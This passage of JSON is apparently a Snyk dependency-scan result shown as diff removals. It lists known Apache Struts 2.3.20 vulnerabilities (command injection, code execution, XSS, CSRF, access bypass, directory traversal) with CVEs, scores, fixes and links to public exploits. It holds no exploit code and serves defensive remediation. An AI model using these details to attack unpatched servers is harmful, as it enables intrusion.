"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.32" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", - "title": "Command Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.3.20.2)", - "[2.3.24, 2.3.24.2)", - "[2.3.28, 2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39756", - "title": "Exploit DB" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:02.554699Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.334921Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", - "epssDetails": { - "percentile": "0.99987", - "probability": "0.97524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3081" - ], - "CWE": [ - "CWE-77" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.315000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T04:32:51Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-04-22T04:32:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:20.892839Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30771", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.20.2)", - "[2.3.24,2.3.24.2)", - "[2.3.28,2.3.28.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.20.2", - "2.3.24.2", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:47.685356Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.390655Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:47.685356Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", - "epssDetails": { - "percentile": "0.99401", - "probability": "0.95903", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3082" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.327000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-04-22T02:36:52.273000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-04-22T02:36:52.273000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:47.685356Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30772", - "title": "Arbitrary Command Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2,2.3.20.2)", - "[2.3.24,2.3.24.3)", - "[2.3.28,2.3.28.1)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.20.2", - "2.3.24.3", - "2.3.28.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://exploit-db.com/exploits/39919", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", - "title": "NVD" - }, - { - "url": "https://www.exploit-db.com/exploits/39919", - "title": "Exploit DB" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:49.896841Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.893991Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:49.896841Z" - } - ], - "description": "## Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", - "epssDetails": { - "percentile": "0.97435", - "probability": "0.46493", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3087" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T00:40:36Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-02T00:40:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:12.756827Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.3.28)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.28" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:54.345030Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:27.272926Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:54.345030Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", - "epssDetails": { - "percentile": "0.88699", - "probability": "0.01905", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4003" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.353000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T06:52:13.014000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-03-16T06:52:13.014000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:54.345030Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", - "title": "Cross-site Request Forgery (CSRF)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-038.html", - "title": "Apache Struts Security Bulletin" - }, - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:55.023333Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:09.208211Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:55.023333Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", - "epssDetails": { - "percentile": "0.75315", - "probability": "0.00450", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4430" - ], - "CWE": [ - "CWE-352" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.364000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:00:37Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-20T07:00:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.023333Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-040.html", - "title": "Apache Struts Security Bulletin" - }, - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:55.000380Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.211840Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:55.000380Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", - "epssDetails": { - "percentile": "0.83001", - "probability": "0.00914", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4431" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.377000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T04:49:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-21T04:49:27Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.000380Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.417349Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", - "epssDetails": { - "percentile": "0.77304", - "probability": "0.00531", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4433" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.390000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T01:33:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-21T01:33:07Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.478661Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.31)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.31" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-042.html", - "title": "Apache Security 